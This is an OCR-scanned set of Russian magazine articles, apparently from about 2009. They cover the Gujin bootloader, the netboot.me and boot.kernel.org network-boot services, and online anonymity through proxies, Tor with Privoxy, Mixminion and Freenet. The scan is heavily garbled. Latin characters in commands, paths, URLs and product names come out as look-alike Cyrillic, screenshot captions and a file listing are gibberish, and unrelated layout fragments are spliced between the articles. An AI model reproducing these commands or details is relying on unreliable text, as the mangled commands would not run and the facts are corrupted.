пример, 150-образы, СО-ВОМ, флоппи-диски, 
скрытые разделы), активация джойстика (!) 
и многое другое. Включая итакой пункт, как 
удаление Сщіп и восстановление прежнего 
загрузчика. Изменения будут сохранены. 
Командный интерфейс Сщіп достаточно прост 
и включает в себя: 

1. Установку за грузчика на выбранное устройство: 

$ зисіо ди з іп /сіеѵ/зсіа 

Устройством может быть и ІІ5В-брелок, и прос- 
той файл. 

2 . Получение информации о наличии загрузчи- 
ка на выбранном устройстве: 

$ зисіо ди^іп --герогС /сіеѵ/зсіа 

Кроме имени установленного загрузчика, на 
экран будет выведена масса другой диагнос- 
тической информации. 



загрузчиком, каталог/изг/зЬаге/бос/дщіп/ 
с документацией, тап-страница и «вторая 
голова»загрузчика/ЬооІ/дцііп.еЬіо5. Уже на 
этом этапе работоспособность Сщіп можно 
проверить, просто перезагрузив машину. 
Если желания перезагружаться нет, просто 
установи дети и выполни команду: 



$ зисіо дети /сіеѵ/зсіа 



На экране ты должен увидеть меню загрузчика 
и список операционных систем на выбор. Кла- 
виши <Е1-Е12> предназначены для выбора 
вариантов загрузки, клавиши «+» и «-» позво- 
ляют изменить разрешение экрана, клавиша 
«точка» переводитзагрузчик в текстовый 
режим и обратно, клавиши «/» и «*» изменяют 
количество цветов, пробел открывает меню 
настроек. В идеале должна работать еще и 
мышь, но в дети она почему-то отказывается 
фурычить. 

Меню настроек позволяет контролировать 
многие аспекты поведения и внешнего вида 
загрузчика. Такие как информация, отобража- 



ПОЛЕЗНЫЕ ОПЦИИ КОМАНДНОЙ СТРОКИ СУЛИ 



— ЬооТсІіг=каталог — дополнительный каталогдля поиска ядер и загрузочных образов. 
--стсШпе=»» — опции Ыпих-ядра. 

-і, — Іиіі — проверка на сбойные сектора перед запуском операций с накопителем. 
--тЬг-беѵісе=устройство — записать МВВ на указанноеустройство. 

—диіскЬоо1:=число — количество секунд, по прошествии которых начинает загружаться ОС (в 
случае, если найденатолько одна ОС). 

--Ье!аи11:_ісІе_ра55ѵѵогсІ=пароль — пароль для доступа к залоченному ЮЕ-диску. 
--бе!аии_ѵібео_тосІе=номер — дефолтовый ѴЕ5А-режим для меню (номера режимов можно 
посмотреть, нажав <ТаЬ> в меню загрузчика). 

-6=, --сІІ5к=005| ВСО I РІ С I РЬО РРУ I ЮЕ I В 105 1 ЕВ 1 05 ... — метод доступа к диску во время поиска 
второй головы загрузчика (полезно для устаревших материнокили сбойных ВІОЗ’ов). 

-С0М[1 -4][,<9600>[,<п>[,<8>[,<1 >]]]]], --5егіаІ=С0М[1 -4]... — последовательный порт для досту- 
па к меню загрузчика вместо экрана. 



Не каждый ВІ05 сможет использовать 115В- 
накопитель стаблицей разделов для загрузки 
операционной системы. Поэтому предпоч- 
тительнее отформатировать флешку в так 
называемом формате зирегііорру, при котором 
она будет представлять собой один большой 
раздел (без таблицы разделов): 

$ зисіо ди^іп --сіізк=ВІ05 : 0x00 , аиСо 

/сіеѵ/зсіс 

Сщіп можно использовать для создания загру- 
зочных СО (расширение ЕІ-ТогіЕо) . Для этого 
подготовь с помощью ткізо или другой про- 
граммы 150-образ с нужным тебе дистрибути- 
вом (конечно, его придется немного допилить) 
и выполни команду: 
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Ііго 


5272 


2009-12-29 


}1т 


2025 


2009-12-29 


1 1т 


239 


2009-12-29 


}1т 


998 


2009-12-29 


] ІІК1 


29488 


2009-12-29 


Ііт 


5552 


2009-12-29 


]1т 


13944 


2009-12-29 


)1т 


8568 


2009-12-29 


ЗІт 


139 


2Ѳ09-12-29 


діт 


139 


2009-12-29 


3 1 т 


109 


2009-12-29 



14:09 гпегасіипір/тепігішпр .сот 
14 : Й 1 тосіиіез/д іхЬоо! . сот 
14:01 тосІиІез/ромего’Р’Р.сот 
14:31 тойиІез/рхесЬаіп.сот 
14:09 гпіооіз/зузііпих 
14:Ѳ9 иііѴз/де*ЬозІір 
14:09 иііІз/ізоНуЬгісі 
14:09 иіііз/ткйізіатаде 
14:00 ѵегзіоп.деп 
14:00 ѴвГЗІОП.Ь 
14:00 ѵегзіоп.тк 



гмхг-хг-х 1 

-ГМ-Г--Г-- 1 

~гм-г~*г-« 1 

- гм- г- - г- - 1 
-гмхг-хг-х 1 
-гѵгхг-хг-х 1 

-ПлГХГ-ХГ-Х 1 

-гшг-хг-х 1 

- РкѴ- Г" г— 1 

- пѵ- г- - г- - 1 

-ГМ-Г--Г-- 1 

НеПо ИЪгШ 

--> Оепегаііпд Іпзіаііегз 

-- Ачиігіпд апсі Зеіііпд ир Сепіоз Меіѵгогк Іпз^аѴІегз 

Ѵегзіопз іп Ѵаиіі РоипсІ : 3.1 3.3 3.4 3.5 3.6 3.7 3.3 4. 0 4.1 4.2 4.3 4.4 4.5 4.6 5. 



Представительство РгееВБР 



0 5Л 5 . 2 



в Сети 



Ѵегзіопз іп Сиггепі Роипсі: 3.9 3 4.7 4.8 4 5.3 5.4 5 



Ѵегзіопз іп Апсіепі РоипсІ; 2,1 

> бе^ііпд Сепіаз 2.1 - І386 

***--*> беіііпд Сепѣоз 3.1 * І386 

_> сеіііпд Сепіоз 3.1 - х86_64 

Сеіііпд Сепѣоз 3.3 * І386 

> Сеіііпд Сепіоз 3,3 - х86_64 

^-****> беіііпд Сепіоз 3.4 * І386 



этом ниже]. 

4. Сервис можетбыть использован для загрузки 
бездисковых рабочих станций. Загрузчик 
можно записать прямо в В 105, благодаря 
чему бездисковыетерминалы, не имеющие 



Такое меню сгенерировал 0 и | і п на моей машине 



возможности загружать ОС с носителей, смогут 



загрузить ОС прямо из интернета. 



ОГРАНИЧЕНИЯ БУЛИ 



* 1 5 150-образов на раздел. 

* Каждый образ 150 должен состоять максимум из 1 27 фрагментов. 

* Медленная загрузка 150 на ехі2/ехіЗ. 

* Большинство ЬіѵеСО не поддерживается из-за того, что образы ядра имеют нестандарт- 
ные названия и расположены не в каталогах/ и/ЬооТ 

* Нередко Ощіп не может определить параметры загрузки ядра для большинства ЫѵеСБ, 
потому что они заданы не при сборке, а в опциях собственного загрузчика. 



В основе пеШооЕте лежитзагрузчикдРХЕ 
[ ЬЛрѴ/ебаегЬооЬогд/ѵѵікі ] , созда н н ы й дл я 
обеспечения возможности сетевой загрузки 
машин, не имеющих поддержки РХЕ. В отличие 
от РХЕ, располагающегося в памяти сетевого 
адаптера, загрузчикдРХЕ можетбыть записан 
на жесткий диск, флоппи-диск, ІІ5В-флешку и 
поддерживает дополнительный набор сетевых 
протоколов, таких как РТР, НТТР и N55. После 
загрузки д РХЕ запрашивает меню опера- 
ционных систем у сайта пеШооЕте и отдает 



$ ди^іп ішаде.ізо 

Команда изменит первые 512 байт файла и 
допишет в его конец небольшой ЕАТ-раздел, 
содержащий вторую голову загрузчика. После 
файл можно записать на диск или 1)5В-флешку. 
Опция ‘-К сработает и в этом случае. С помощью 
не менее простой команды ты легко превра- 
тишь Эщіп в 005-программу, которую сможешь 
использовать для загрузки Ыпих из 005: 

$ дсщ іп ЬооС . ехе 

ОШШ. ВЫВОДЫ 

На моей машине Ощіп отработал идеально. 

Все, что понадобилось сделать — установить 
пакет и перезагрузить машину. Меню содер- 
жало все найденные ядра, а сам загрузчик 
благополучно отдавал управление ОС. Учиты- 
вая, что Ощіп способен искать нетолько ядра, 
но и МВР-записи, 150-образы, другие ОС на 
жестких дисках, 1)5В-брелках, флоппи-дисках, 
и при этом сам благополучно загружается со 
всех этих устройств, осмелюсь предположить, 
что на сегодня это самый продвинутый и 
простой в использовании бутлоадер. Поэтому 
я буду вспоминать о нем каждый раз, когда 
мне понадобится организовать нестандартную 
схему загрузки чего-либо. 

СЕТЕВОЙ ЗАГРУЗЧИК 

Хотел бы иметь флешку, содержащую мно- 
жество самых разных Ыпих-дистрибутивов и 



различных диа гностических утилит, которые 
находились бы в актуальном состоянии в любой 
момент времени? Скажешь, это невозможно? 
Отнюдь нет, создатели проекта пеіЬооСте 
предлагаютскачатьобразтакой флешки весом 
меньше одного мегабайта. 

Все просто: образ содержит сетевой загрузчик, 
который позволяетзагрузить (и установить] 

ОС прямо из интернета, предлагая на выбор 
несколько вариантов дистрибутивов. Да, это 
очень медленный и «трафико-затратный» 
способ, но он имеет массу достоинств: 

1. Возможность экспериментировать с несколь- 
кими ОС и установить понравившуюся без 
дополнительныхтелодвижений (так или иначе 
тебе все равно придется выкачивать образы ОС 
из интернета]. 

2. Сервис позволяетзагрузить массу незави- 
сящих от ОС утилит (вроде тет1:е5І86]. Они 
всегда будут под рукой, а их загрузка займет 
секунды. 

3. Возможность организации массовой уста- 
новки на множество машин. Можно установить 
собственный приватный сервер загрузки (об 



управление пользователю. 

Кроме всего прочего, пеіЬооСте позволя- 
ет добавлять в меню загрузчика собствен- 
ные пункты. Для этого необходимо оста- 
вить на сайте пути к собственным кегпеі 
и іпіітсі и прописать необходимые опции. 
Если конфигурация понравится админис- 
траторам сервиса, она будет добавлена в 
меню. 

На данный момент пеіЬооСте предлагает 
три образа дРХЕ-загрузчика: для записи на 
Ю5В-брелок, флоппи-диски СО. Чтобы вос- 
пользоваться его возможностями, достаточно 
выполнить ряд простых действий: 

1. СкачатьдРХЕ-загрузчик. 

2. Записать на носитель: 

$ зисіо сісі іі=пеіЬооЦше . сізк оі=/сіеѵ/ 
ісШ / / Флоппи-диск 

$ зисіо сісі іі=пеСЬооЦше .изЬ оі=/сіеѵ/ 
зсіі // ІІЗВ-брелок 

3. Загрузиться с носителя. 

В случае статической настройки сети тебе 
придется указать свои сетевые реквизиты, но 



ПРОБЛЕМА ЗАГРУЗКИ ШВООТ.МЕ И ВКО 



На некоторых машинахзагрузочные диски пеШооЕте и ЬооЕкегпеІ.огд могут отработать 
неправильно, в результате чего ты неувидишьзагрузочное меню и не сможешь произ- 
вести выбор ОС. Причина в установке загрузчиком неподдерживаемого видеоадаптером 
режима. Исправить ситуацию пока нельзя, ноты можешь воспользоваться режимом 
командной строки (комбинация <СМ+В>] для ручной загрузки нужной конфигурации. 



► 086 
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если сетью управляет ОНСР-сервер, всезаработает«из 
коробки». 

4 . Выбрать операционную систему для загрузки/установки. 
Сейчас поддерживается установка следующих ОС: 

• ОеЬіап І_еппу (5.0). 

• ОеЬіап ТезЬпд. 

• Ребога 1 1 . 

•ОрепЗІІЗЕІІ.1. 

• ІІЬипШ баипіу (9.04). 

• ІІЬипІи Кагтіс (9.10). 

• РгееВЗО 7.2. 

• Міг05 ЬзбДте сиггепі (создана на базе Ореп и ЫеІВБО, 

мѵѵѵѵ.тігЬзсІ.огд ]. 

В виде загружаемых по Сети ЬіѵеСО доступны: 

• Тіпу Соге І_іпих2.2. 

• Місго Соге І_іпих 2.2. 

• Міг05 ЬзсІ4те сиггепк 

Также доступны следующие инструменты: 

• Тестеры памяти Метіезі: 86 и Метцев! 86+. 

• Утилита для показа информации ожелезе НОТ 0.3.4. 

• Мини-дистрибутивы для работы с накопителями ѲРагІесІ 
І_іѵе 0.4. 5-2 и РагіесІ Мадіс 4.5. 

• Спасательные образы ІІЬипІи баипіу (9.04) х86 гезсие и 
ІІЬипіи Кагтіс (9.10) х86 гезсие. 

• ЗагрузчикВтаг! Вооі Мападег. 

Кроме всего перечисленного, в наличии имеется игра 
пеіЬаск и система меню сервиса ЬооТкегпеІ.огд. 

Сервис ЬооТкегпеІ.огд (или сокращенно ВКО] представляет 
абсолютно идентичную пеіЬооі.те функциональность. 

Он использует тот же дРХЕ и предлагает собственный вари- 
антзагрузочного меню, содержащий дистрибутивы: 

• ОеЬіап Ііѵе. 

• ІІЬипіи 9.04. 

• Оатп Зтаіі Ьі п их. 

• Кпорріх 5.0.1 . 

• Ребога 1 1 І_іѵе СО. 

Цель проекта: распространение загрузочных образов сис- 
тем диагностики, инсталляторов дистрибутивов и ЬіѵеСО, 
тестирование экспериментальных версий ядра. 

СОБСТВЕННАЯ КОНФИГУРАЦИЯ 
И СЕРВЕР СЕТЕВОЙ ЗАГРУЗКИ 

Выше я уже упоминал о том, что пеіЬооі.те позволяет 
добавлять в сервис собственную конфигурацию для 
загрузки. Для этого необходимо залить ядро и образ іпбгб 
(дистрибутив должен быть в нем] на какую-нибудь сетевую 
машину с белым адресом, войти на сайт пеіЬооі.те 
(регистрация не требуется, сервис использует аккаунты 
доодіе для управления пользователями], перейти по 
ссылке «МУ С О N Р I О 5 » , нажать на ссылку «пеѵѵ». В появив- 
шемся поле ввести имя новой конфигурации, описание, 



указать адрес ядра в поле «Кегпеі/Ітаде», адрес іпіігб- 
образа в поле «Іпбгб» и необходимые аргументы ядра в 
поле «Агдз». 

После того, как конфигурация будет создана, в поле 
«СЬаіпІоаб ЮРЬ» появится ее адрес, последним элемен- 
том которого будет Ю конфигурации, — его необходимо 
запомнить. При следующей загрузке с помощью пеіЬооТ 
те нажми любую клавишу после появления строки 
«Ргезз апу кеу Тог орТіопз о г ѵѵа ІТ п зесопбз». Выбери 
опцию «Вооі; а сопіідигаііоп бігесНу» и введи Ю своей 
конфигурации. 

В отличие от пеіЬооі.те, сервис ЬооТкегпеІ.огд не позволя- 
ет создавать собственные конфигурации, зато он полностью 
открыт. А это значит, что всю используемую ими платформу 
сетевой загрузки можно скачать и установить на свой сер- 
вер. Попробуем так и сделать. 

Для начала установим инструменты сборки, систему управ- 
ления версиями д ІТ и ассемблер пазт: 

$ зисіо арТ-деТ іпзТаІІ ЪиіІсІ-еззепТіаІ діТ- 
соге пазт 

Затем получим исходные тексты системы ВКО: 

$ діТ сіопе діТ : //діТ . еЫіегЬооТ . огд/зст/ 
реорІе/ргаѵіп/ВКО . діТ 
$ с (б ВКО 

$ діТ зиЪтосТіІе іпіТ 
$ діТ зиЪтосІиІе ирсІаТе 

Отредактируем конфигурационный файл сопіід так, чтобы 
опция ВА5Е_Ы ВТ содержала ЫРТ, по которому будет до- 
ступен ВКО (он будет вшит в дрхе], а опция І50_Т0САТІ0І\І_ 
ТОСАТ — ОПТ 150-образов дистрибутивов (сделаем его 
равным ВА5Е_Ы РЬ/ІЗО). 

Теперьзапускаем процесс сборки дрхе и всех остальных 
компонентов ВКО: 

$ таке 

$ ссі іпзТа11_1те1р 
$ . /сопТідиге_ВКО . зк 

Скачаем модифицированные образы іпіігатіз поддержи- 
ваемых дистрибутивов и их 150-образы: 

$ . /с!оѵт1оас1_іпіТгатТз_ітадез_]тТТр . зк 
$ . /<іоші1оасі_ІЗО . зк 

Все, осталось только перенести содержимое каталога ВКО 
в корень веб-сервера (например, /ѵаг/ѵѵѵѵѵѵ] и выставить на 
файлы корректные права доступа . т 




> ѵѵагпіпд 

По умолчанию Ои]іп 
ищетядра, образы 
загрузочных дискет 
Ц.ЬсІі] и 150-обра- 
зы в каталогах / и / 
ЬооТ Чтобы научить 
загрузчик искать 
файлы и в других 
каталогах, необхо- 
димо использовать 
опцию «— Ьооісііг=/ 
путь/до/каталога» 
во время установки 
загрузчика. 
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ІШІХОЮ 



Евгений Зобнин гоЬпіпгадтаіІ.сот 



1 ч\ І- 

Под юкровом 
шапки-невидимки 

Как обеспечить анонимность при работе 
в интернете 



Перестав бытьакадемической сетью и превратившись в глобальную 
среду развлечений и коммерции, интернет утратил былую свободу. Те- 
перь интернет-сайты, провайдеры, хостеры и все, кто занимается интер- 
нет-бизнесом. нетолько могут, но и обязаны выдавать своих клиентов, 
а за хаксорские проделки, скачивание аудио- и видеоконтента или вы- 
сказывание неугодных политических взглядов можно угодить за решет- 
ку. Какѵкрыться от большого брата так, чтобы не нашли? 



ПРОКСИ-СЕРВЕРЫ 

ИАМ0МѴМ01І5Е.0К6 

Простейшим способом повыситьсвою 
анонимность в Сети является использование 
прокси-серверов, которые позволяютскрыть 
твой ІР-адрес от посторонних глаз с помощью 
его замены на ІР-адрес другого узла. Одна- 
ко это очень простой и малоэффективный 



способ, при которомтвое истинное лицо легко 
раскрыть, просто обратившисьза логами к 
владельцу сервера (обычномулюду, конечно, в 
такой заявке откажут, а вот против спецслужб 
не попрешь]. 

Задачу поиска реального ІР-адреса мож- 
но усложнить, организовав туннель в виде 
цепочки прокси-серверов, проходя через 



который, пакеты будут множество раз менять 
адрес источника. Это даст некоторое преиму- 
щество, однако выследитьтебя опять же будет 
несложно. Обратившись квладельцам первого 
прокси-сервера, твои преследователи выяснят 
адрес второго, а затем и третьего, и всех после- 
дующих прокси. Есть, конечно, немалая вероят- 
ность, что владельцем одного из них окажется 
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настоящий человек-тень, затирающий все 
логи, но уверенным в этом быть нельзя (а что- 
бы быть уверенным, придется заплатить]. 

Для ведения анонимной переписки по е-таіі 
можно использовать различные емейлеры, 
то есть ЗМТР-сервера, уничтожающие все 
заголовки, указывающие на реального отпра- 
вителя, в процессе пересылки. С помощью 
баунсеров (Ьоипсег, Ьпс] ты можешь легко 
скрыть свой реальный ІР-адрес в сети ІРС. Но, 
опять же, эти средства страдают от проблем 
прокси-серверов: при должном терпении твой 
адрес будет нетактрудно вычислить. Гораздо 
больший выигрыш дает использование 
специализированного ПО, созданного с целью 
повысить приватность пользователей Сети. 

ЛУКОВЫЙ МАРШРУТИЗАТОР 

Лучшим и наиболее популярным приложени- 
ем из этой области является ПО Тог, которое 
позволяет организовать сеть виртуальных 
туннелей, проходя через которые, сетевые 
пакеты «обезличиваются», превращая про- 



цесс определения источников и приемников 
трафика в очень сложную процедуру. 

Принцип работы Тог основан на идее так на- 
зываемой «Луковой Маршрутизации» (Опіоп 
Роибпд], которая была предложена еще в 
середине 90-х годов и запатентована Военно- 
морскими силами США. Весь смысл в том, 
что если клиент будет общаться с сервером 
не напрямую, а через цепочку посредников, 
каждому из которых известны только следую- 
щее и предыдущее звенья цепочки — отсле- 
дить истинный источники приемникданных 
(одновременно] будет невозможно в любом 
звене цепи. 

Работаетэто так: клиент, пожелавший устано- 
вить соединение с сервером, делает запрос к 
одному изтрехТог-каталогов, хранящих спис- 
ки всех активных в данный момент Тог-сер- 
веров. Из этого списка он случайным образом 
выбираетопределенное число серверов (не 
меньше трех], каждому из которых отправляет 
собственный симметричный ключ. Затем 
клиент берет исходное сообщение и шифрует 



ключом последнего в цепочке Тог-сервера, 
затем он добавляет к получившемуся пакету 
еще одно сообщение, содержащее адрес пос- 
леднего в цепочке Тог-сервера, и шифрует его 
ключом предпоследнего сервера. Такклиент 
обволакивает сообщение во множество шиф- 
рованных слоев, которые будут сниматься по 
мере прохождения пакета через Тог-сервера. 
Описанная схема гарантирует, чтолюбой 
из Тог-серверов не будетзнать конечного 
адресата пакета, его отправителя и содержи- 
мого одновременно. Каждому из них доступна 
только ограниченная часть информации. 
Например, первый узел цепочки знаетнасто- 
ящий адрес отправителя, но не можетзнать 
содержимое сообщения и адреса получателя. 
Последний узел цепочки знаетадрес получа- 
теля и даже имеет доступ к содержимому сооб- 
щения, но не можетзнать адреса отправителя. 
Все узлы, находящиеся между ними, не знают 
ни адреса отправителя, ни адреса получателя, 
ни содержимого сообщения. 

Чтобы раскрыть всю информацию о соедине- 
нии пользователя сети Тог, злоумышленнику 
придется завладеть сразу всеми узлами, учас- 
твующими в цепочке (или шантажировать их 
владельцев). Учитывая, что в сеть Тог вовлече- 
нытысячи серверов по всему миру, атакжето, 
что выбираются они случайным образом и для 
каждого соединения, можно сказать, что ве- 
роятность компрометации сразу всей цепочки 
серверов стремится к нулю. Завладев же 
только одним узлом цепочки, злоумышленник 
не сможет получить достаточной информации. 
Опасность может представлять только захват 
та к называемых «выходных Тог-серверов», 
выступающих в роли последних звеньев це- 
почки. В этом случае злоумышленник получит 
доступ коригинальному сообщению и сможет 
прочитать передаваемую в нем информацию. 
Именно поэтому для лучшей сохранности 
данные следует передавать по зашифрован- 
ным каналам. 

Кромеутечки данных с выходныхТог-серве- 
ров, существует также и опасность РЫЗ-утеч- 
ки, ведь даже несмотря на то, что сообщение 
будет направлено сквозь «Тог-туннель», 
0Ы5-запрос, раскрывающий адрес получате- 
ля сообщения, может пойти «обходным путем». 
Чтобы избежать этого, следует использовать 
Тог в связке с Ргіѵоху, либо воспользоваться 
сторонними РЫЗ-серверами, такими как 
ОрепОЫЗ или ТогОЫЗ. 

Другая опасность — это возможность выдачи 
клиентом раскрывающей его информации по 
запросу сервера. Так, например, может посту- 
пить клиентское ЧаѵаЗсгірІ-приложение, за- 
груженное в браузер. Поэтому я бы порекомен- 
довал отключить ЧаѵаЗсгі рі: в браузере, либо 
воспользоваться прокси-сервером Ргіѵоху или 
Рігеіюх-расширением ТогЬиМоп. 

Установить и начать использоватьТог 
достаточно просто. Для этого необходимо 
установить Тог-клиент и НТТР-прокси Ргіѵоху, 
который мы будем использовать для перена- 
правления НТТР-трафика в Тог. В последних 
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РгеепеІ 0.7 Іпзіаііаііоп Зиссеззігіі! 

Н«хІ. сопПдиге ртиг негіс аіігі соппес! ртиг по гіе Ій іЬе пеЕ'іѵогк. 

ТЬа- пеиі 5Іер І5 Іо ассевд іИе Ггат іМеге, у-оо с ал- чет ІН? МйЛш оТуоиг нагіе эпгі бое сопіідигаііоп срЕіогге іпсіийід в Іштап-гмгіаЫе' 

п»те і&г уриг пріе. 

(Г уы ееіЛдоге эмоог пой* ю »№|ще1сэ% мшчеі іо ишіиіцгі шгіез (Зігапдвг*). Пчн К зЬеиі і аиі <*п»іісаіі у мт*еі ю |И« ічмлонк міЫп а кч 
пмшім, 

№ у«і кппн раорів иьіпд РгеепеІ, з&к [Ьвігі Тог [Нвсг поікгеТь. И уои опіу соппвсЕ Іо у о иг Рііепгіа ЕНів- тіІІ дгеаііу ітріоѵо я-кигЛу. То сгааЕе а Ііпк «НИ 
апвіНаг погіе, ьепй Еіит ѵоиг мгіемГ япД эгігі ЕПеігя оп іИю {пшпгіз рад». ѴШівп Ьоііі лпгіаінее агііегі Г Іи оіімг'а пмІегеІіНѳу зНоіЛіі еоппесі. II уои лге 
Ьаміпд 4 >Ссиі(і» і«Г*г Іо 1 >ш ГгтмЕ Ссничсіінч «" II»* Гтгт Ріоіосі Ѵ/ікі . 

И 1 у» Нм злу ртйЫзт), рі«азз «пЕкі из оп ЕС о« ЖТипоі оп іге .Іімпвгі*. пег. ог №о иоооі шя*лд ІІЯ 
Ехріоге зг іі еогігІЬиІе Іо РгеепеІ 

Уоо сап ЫаіЕ Ъю№Іпд Ьовгііоя имід шн оІІІіа Ьчюкпнгкь ІБІегі оп іііо Нмпу рзд^ Ргмп ймва. уои сап ѵіон а Ілгде атмшЕ иІЕііе сопІепЕ ол РгеепеІ. 

Ѵои сап аі» Ьпмг» апгі рои іл 11 м апміупміі* тдеіаде Ьиігі аррііоаімл, Ргоіі. Тйл I* асо*з*і№ іыоидь ІН» Ргозі' гіккіар «оп К уоо о№н Іо 

іпЯаІ іі 

□псе уоиѴе звоп ямпе лІЕІів соШвпЕ зііеагіу оп РгеепеІ. у о и соиігі Ну изіпд .Ккв Ео сгеаіе уміг інѵп РгеазіЕе Гог віНега Ео ЬсомяеІ 

Олео адііп, Оівпіі уои Гог ивіпд РгеепеІ! 

ЙОтвпЬіТ, РгОёПвЕ I» аІІ эЬиіЕ Егвегіот оГ фМСІІ Ѵоо юзу ГіМ С О [ШОПЕ ОЛ Р'ОЗіЧІ Иаі уоо СЛНЗІгіег ОІ^ПЗМ ОГ иічОсВрІаЫ*. И ИМ* СМЮИП* уои. іНЗЕі 
соггеиіег слгеТиІу ѵгііаі Ьікэ уоо I піеЕ ап^ иНаІ іпіівкйз ал^ (гаеяквБ уои ЕеЕсЛ. 

ТНа Ріоопоі Ріоіесі еппріоуа а ГиІІ-Іипе ікѵвіврвг. К уои сап„»е лоиіі ярргесіаЕо И ксоиИ іІопаГе Ео іНе оюіесі ьо іНаІ т сап соШіпие Іо отріоу Іііт 
ЗП(І коор оп ітргочіпд «иг 10ГЬ#*Т* 

«і№ уои я рівазаш *хриі*пс* іл Ню Ігі+ичгІНІ 

Оеі віагіегі оп РгеепеІ! 

™* Р а ?е Ія ІімлзеіІ лпіім ЕНв ДЩ ЁДИІ ОаСИІЖЙ^аПІІИДИ 




Установка РгеепеІ: прошла успешно 

версиях ІІЬипіи Тог-клиент недоступен, поэто- 
му мы установим его из репозитория авторов 
программы. Для этого добавляем в файл/еіе/ 
арУзоигсезТізІ; следующую строку: 

сіеЬ ЬССр : / /сіеЪ . Согрго^ есС . огд/ 
Согргоз есС . огд кагшіе шаіп 

Запрашиваем ключи у сервера сертификации: 

$ дрд --кеузегѵег кеуз . дгшрд . пек 
--гесѵ 886ВББ89 

$ дрд --ехрогк АЗС4Р0Р979САА22СБВА8 
Р512ЕР8СВС9Р886БББ89 I зийо арк-кеу 
асісі - 

Обновляем арі-кэш и устанавливаем необходи- 
мые компоненты: 

$ зисіо арБ-деБ ирсіаБе 
$ зисіо арБ-деБ іпзБаІІ Бог Бог- 
деоірсіЬ ргіѵоху 

После окончания установки открываем кон- 
фигурационный файл Ргіѵоху и пишем в него 
следующую строку: 

БогмагсІ-зоскз4а / 127.0.0.1:9050 . 
Запускаем Ргіѵоху: 

$ зисіо /еБс/іпіБ . сі/ргіѵоху зБагБ 

Устанавливаем плагин ТогЬиНоп для Рігеіюх. 

Его можно взять со страницы ЫірзУ/асІсІопз. 
тогіЦа.огдЛігеіох/ЗЗУб/ или же установить 
средствами арЕ 

$ зисіо арБ-деБ ІпзБаІІ БогЬиББоп- 
ехБепзіоп 



Перезапускаем браузер, активируем режим 
работы через Тоге помощью нажатия кнопки 
внизу справа. Переходим на страничку ЬНрз:// 
сбескТогргоіесБога для проверки работоспо- 
собности Тог. На экране должна появиться зе- 
леная луковица. Остальные приложения легко 
перевести на использованиеТогс помощью 
указания адреса Ргіѵоху (ІосаІНозЕ81 18] или 
ЗОСКЗ-сервера Тог(ІосаИіозЕ9050] в настрой- 
ках. Чтобы научить консольные приложения, 
такие какѵѵдер Іупх, ар! и другие, использовать 
Тог, добавь в свой -/.Ьазбгс следующие строки: 

ехрогБ 1іББр_ 

ргоху=кББр :// 12 7. 0.0. 1:8118/ 

ехрогБ НТТР_РКОХУ=$ііББр_ргоху 

Стандартная поддержка 50СК5 в 55Н не под- 
ходит для Тог, поэтому придется изловчиться и 
воспользоваться зосаЕ 

$ зисіо арБ-деБ ІпзБаІІ зосаБ 

Далее открой конфигЗЗН (-/.ззЬ/сопбд) и 
пропиши в него две строки: 

НозБ * 

РгохуСошгпапсі зосаБ 8ТБІО 80СК34А:12 

7 . 0 . 0 . 1 : %Ъ : %р , зоскзрогБ=9050 

Тог обеспечивает интерфейс для доступа к 
своей функциональности из других приложе- 
ний, поэтому существует несколько проектов, 
которые позволяют использовать его возмож- 
ности для ведения какой-либо анонимной 
деятельности в сети интернет. Одним изтаких 
приложений является ТогсЬаІ [ ЬИрзУ/сосІе. 
доодІе.сот/рЛогсЬаі/ ]. специальный чат- 
клиентдля сети Тог, полностью скрывающий 
личности его участников. 



Тогсбаі: написан на Руібоп и нетребует ка- 
кой-либо настройки, поэтому для начала его 
использования достаточно установить пакеты 
руіЬоп2.5, руЕИоп-ѵѵхдБк2.8 и запустить ІогсЬаТ 
ру, находящийся внутри архива с программой. 

СМЕШИВАЮЩИЙ ЛЮБИМЕЦ 

На тех же принципах Опіоп Роибпд (а точнее 
более ранней концепции — Міх пеіѵѵогк] 
построена разработанная в Беркли система 
анонимной почтовой переписки Міхтіпіоп 

( ЫірУ/тіхппіпіоп.пеІ: ). 

Первые две версии системы ничем не отли- 
чались от стандартных ремейлеров, режущих 
заголовки, однако третья версия ушла далеко 
вперед и обеспечила не только удаление 
заголовков, но и способ пересылки писем, 
основанный на идее «смешанной сети». 

Клиент тіхтіпіоп разбивает оригинальное 
етаіі-сообщение на фрагменты постоянной 
длины, для каждого из которых выбирает- 
ся своя цепочка серверов. При этом срок 
жизни одного ключа ограничен, а отправитель 
получает ответ с помощью закрепленного за 
ним зашифрованного псевдонима. В качестве 
средств против анализа трафика присутствуют: 
разбивка сообщения на блоки постоянного 
размера в 28 Кб, случайная задержка во время 
отправки каждого блока, а также перемешива- 
ние последовательности блоков ремейлером. 

СВОДНАЯ СЕТЬ 

Идея полностью свободной анонимной сети 
РгеепеІ: [ Ыір://1теепеі:рго]есЕогд І принадлежит 
Яну Кларку (Іа п Сіагке], который в 1999 году 
защитил работу «А ОізБгіЬиіесІ, Бесепіхаіізесі 
Іпіогтабоп Біо га де апб ВеІгіеѵаІБузІет» в 
Эдинбургском университете и вскоре после 
этого собрал команду разработчиков, чтобы 
превратить свою идею в реальность с открыты- 
ми исходными кодами. 

РгеепеІ: представляет собой одноранговую 
сеть, предназначенную для децентрализо- 
ванного распределенного хранения данных, 
источник и приемник которых невозможно 
определить никакими средствами. В отличие от 
Тог, РгеепеІ: не обеспечивает средств выхода в 
интернет, а создает собственный свободный и 
никем неограниченный мироквнутри сущест- 
вующей сети. 

Абстрактно РгеепеІ: представляется огромным 
хранилищем информации, все данные которого 
размазаны поузлам, входящим в анонимную 
сеть. Узел, поместивший данные в это храни- 
лище, получает ключ, адресующий их. Когда 
данные понадобятся вновь, узел предъявляет 
ключ и получает данные обратно. 

На более низком уровне это выглядиттак: каж- 
дый узел, вовлеченный во РгеепеІ, выделяет 
некоторый объем дискового пространства и 
резервирует часть пропускной способности ин- 
тернет-соединений для нужд сети. Когда один 
изузлов обращается к РгеепеІ и делаетзапрос 
на записьфайла, клиентское ПО генерирует 
хеш-ключ этого файла (на основе 5НА-1 ] и 
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отдает его вместе с файлом нескольким соседям — 
ближайшим узлам Егеепеі, которые сохраняют их в своем 
локальном хранилище и отдают своим друзьям, они в свою 
очередь поступают таким же образом. Количество перебро- 
сов файла между узлами может быть любым, поэтому, когда 
файл закончитсвои путешествия, определить его источник 
без прохождения всей цепочки от начала до конца будет 
практически невозможно. 

Аналогично происходит чтение записанного файла. Сосе- 
дям узла отправляется ключ файла (фактически во Егеепеі 
это эквивалент имен файлов], которые проверяют, есть 
